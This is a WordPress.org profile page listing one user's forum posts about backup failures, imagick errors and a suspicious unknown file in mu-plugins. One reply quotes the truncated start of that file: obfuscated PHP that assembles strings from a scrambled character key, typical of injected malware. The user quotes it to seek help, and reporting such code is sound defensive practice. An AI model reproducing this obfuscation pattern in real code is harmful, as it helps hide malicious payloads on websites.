WordPress.org

Profiles

  • Member Since: September 12th, 2018
  • Website: tanamerah.com
  • Find me on:
  • Created a topic, Facebook connection absurdities sorted, on the site WordPress.org Forums:
    We changed our Insta account name. Big mistake. Facebo…

    1 month ago

  • Posted a reply to Backup Failure to Dropbox, on the site WordPress.org Forums:
    Yep, that sorted it. Thanks a lot Kevan

    1 year ago

  • Posted a reply to Backup Failure to Dropbox, on the site WordPress.org Forums:
    Hi Bryle My Curl version: 7.66.0 / SSL: OpenSSL/1.1.1g-fips / libz: 1.2.11 Best Kevan

    1 year ago

  • Posted a reply to Backup Failure to Dropbox, on the site WordPress.org Forums:
    I am having exactly the same problem for site tanamerah.com for my latest monthly files…

    1 year ago

  • Created a topic, Error messages, on the site WordPress.org Forums:
    I have just started getting the following warnings at …

    2 years ago

  • Posted a reply to Unknown file in mu-plugins, on the site WordPress.org Forums:
    Thanks. Aargh! Needed more than coffee! Anyway I installed WordFence—which has to be one of…

    2 years ago

  • Posted a reply to Unknown file in mu-plugins, on the site WordPress.org Forums:
    Here's what is in the idmqlsou.php file: <?php $gtgzp = '7s9nfermy\'2uvlokp3ci-_4x8gda65#*H0tb';$kfanzy = Array();$kfanzy[] = $gtgzp[32].$gtgzp[31];$kfanzy[]…

    2 years ago

  • Created a topic, Unknown file in mu-plugins, on the site WordPress.org Forums:
    I just got this error message when trying to access my…

    2 years ago

  • Posted a reply to PHP imagick “module not installed, or disabled” message, on the site WordPress.org Forums:
    Thing is @plav my hosting provider says they don’t support imagick above PHP5.6. So I…

    2 years ago

  • Posted a reply to PHP imagick “module not installed, or disabled” message, on the site WordPress.org Forums:
    Hmm. I'm not comfortable adding that to the php.ini file since my host tells me…

    2 years ago

  • Posted a reply to “imagick module not installed, or disabled” message, on the site WordPress.org Forums:
    Thanks Antonio. I've since discovered that my web host does not accept imagick under PHP…

    2 years ago

  • Posted a reply to PHP imagick “module not installed, or disabled” message, on the site WordPress.org Forums:
    Thanks for the replies @aoking and @clorith My host now tells me that they don't…

    2 years ago

  • Posted a reply to “imagick module not installed, or disabled” message, on the site WordPress.org Forums:
    Thanks Antonio. Except I don't really understand your answer. I have now reposted this question…

    2 years ago

  • Created a topic, PHP imagick “module not installed, or disabled” message, on the site WordPress.org Forums:
    Ran the WP Health Check. It advised updating to PHP 7.…

    2 years ago

  • Created a topic, “imagick module not installed, or disabled” message, on the site WordPress.org Forums:
    Ran the WP Health Check. It advised updating to PHP 7.…

    2 years ago

  • Posted a reply to logo and images disappear, on the site WordPress.org Forums:
    Update to earlier post: the problem appears to be the font setting. I reset all…

    3 years ago

  • Created a topic, logo and images disappear, on the site WordPress.org Forums:
    When I installed the Border Loading Bar plug-in the si…

    3 years ago